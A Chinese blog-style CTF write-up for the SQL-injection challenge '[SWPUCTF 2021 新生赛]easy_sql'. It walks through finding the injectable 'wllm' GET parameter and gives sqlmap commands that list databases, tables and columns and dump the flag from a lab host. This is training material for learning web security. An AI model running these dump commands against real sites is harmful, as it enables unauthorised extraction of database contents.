CTF(三)

 导言:

本文主要讲述在CTF竞赛中,web类SQL注入题目[SWPUCTF 2021 新生赛]easy_sql。

靶场链接:[SWPUCTF 2021 新生赛]easy_sql | NSSCTF

SQL注入:

SQL labs靶场-SQL注入入门_sql注入靶场-优快云博客

一,观察页面。

从页面标签可以知道传参数是wllm。

二,测试漏洞存在。

可以知道,存在SQL注入漏洞,并且传参方式是get。

三,使用sqlmap梭哈。

sqlmap使用方法详见:SQL labs-SQL注入(三,sqlmap使用)_sqlmap sql-labs-优快云博客

使用sqlmap进行注入,可以看到,已经证实确实存在SQL注入漏洞。

sqlmap  -u http://node4.anna.nssctf.cn:28234/?wllm=1 --dbs

得到所有库名。

sqlmap  -u http://node4.anna.nssctf.cn:28234/?wllm=1 -D test_db --tables

得到 test_db 库下的所有表名。

sqlmap  -u http://node4.anna.nssctf.cn:28234/?wllm=1 -D test_db -T test_tb --columns 

找到flag所在字段。

sqlmap  -u http://node4.anna.nssctf.cn:28234/?wllm=1 -D test_db -T test_tb -C flag --dump 

得到flag。

四,后记。

sqlmap是很常见的SQL注入工具,但也不排除存在无法使用的情况,此时就应该使用手工注入;

文章链接:SQL labs-SQL注入(六)-优快云博客

同时也可能伴随着很多的过滤与干扰项,也有可能与其他漏洞共同存在,综合利用才能得到flag。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值